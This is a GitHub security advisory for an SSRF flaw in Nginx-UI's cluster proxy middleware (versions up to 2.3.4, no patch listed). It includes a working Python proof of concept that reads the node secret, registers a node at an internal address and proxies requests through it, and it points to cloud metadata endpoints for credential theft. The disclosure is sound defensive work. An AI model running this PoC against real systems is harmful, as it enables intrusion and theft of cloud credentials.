Skip to content

Nginx-UI has Server-Side Request Forgery (SSRF) via Cluster Proxy Middleware that Allows Access to Internal Services

High severity GitHub Reviewed Published Apr 22, 2026 in 0xJacky/nginx-ui • Updated May 13, 2026

Package

gomod github.com/0xJacky/Nginx-UI (Go)

Affected versions

<= 2.3.4

Patched versions

None

Description

Summary

An authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the X-Node-ID header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.

Details

The nginx-ui Proxy middleware (internal/middleware/proxy.go) intercepts API requests containing an X-Node-ID header and forwards them to the URL of the corresponding cluster node. An attacker can:

  1. Read the node_secret from GET /api/settings (accessible to any authenticated user)
  2. Create a cluster node via POST /api/nodes pointing to any internal URL:
{
    "name": "ssrf_node",
    "url": "http://127.0.0.1:51820",
    "token": "<node_secret>",
    "enabled": true
}
  1. Send any API request with the X-Node-ID header set to the created node's ID:
GET /api/settings HTTP/1.1
Authorization: <token>
X-Node-ID: 1
  1. The Proxy middleware forwards this request to http://127.0.0.1:51820/api/settings, making a server-side request to the internal address.

Vulnerable code path:

  • internal/middleware/proxy.goProxy(): no validation of the node URL; allows 127.0.0.1, localhost, internal IPs, cloud metadata endpoints, etc.

The node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.

PoC

import requests

BASE = "http://TARGET:9000"
TOKEN = "<authenticated_jwt_token>"
HDR = {"Authorization": TOKEN}

# Step 1: Get node_secret
settings = requests.get(f"{BASE}/api/settings", headers=HDR).json()
node_secret = settings["node"]["secret"]

# Step 2: Create SSRF node pointing to internal service
resp = requests.post(f"{BASE}/api/nodes", headers=HDR, json={
    "name": "ssrf",
    "url": "http://127.0.0.1:51820",  # internal-only port
    "token": node_secret,
    "enabled": True,
})
node_id = resp.json()["id"]

# Step 3: SSRF — request is forwarded to http://127.0.0.1:51820/api/settings
resp = requests.get(
    f"{BASE}/api/settings",
    headers={**HDR, "X-Node-ID": str(node_id)},
)
print(resp.status_code, resp.text[:200])
# Response comes from the INTERNAL service, not nginx-ui

This can also target cloud metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/) or any other internal service.

Impact

An authenticated attacker can:

  • Access internal services bound to localhost or private networks that are not intended to be externally reachable
  • Access cloud metadata endpoints (AWS/GCP/Azure instance metadata) to steal IAM credentials
  • Port-scan internal networks by creating nodes pointing to different internal IPs/ports
  • Trigger internal-only njs endpoints to escalate privileges (as demonstrated in the companion RCE advisory)
  • Bypass network segmentation and firewalls that only restrict inbound traffic

References

@0xJacky 0xJacky published to 0xJacky/nginx-ui Apr 22, 2026
Published to the GitHub Advisory Database Apr 29, 2026
Reviewed Apr 29, 2026
Published by the National Vulnerability Database May 12, 2026
Last updated May 13, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(2nd percentile)

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

CVE ID

CVE-2026-44015

GHSA ID

GHSA-wr32-99hh-6f35

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.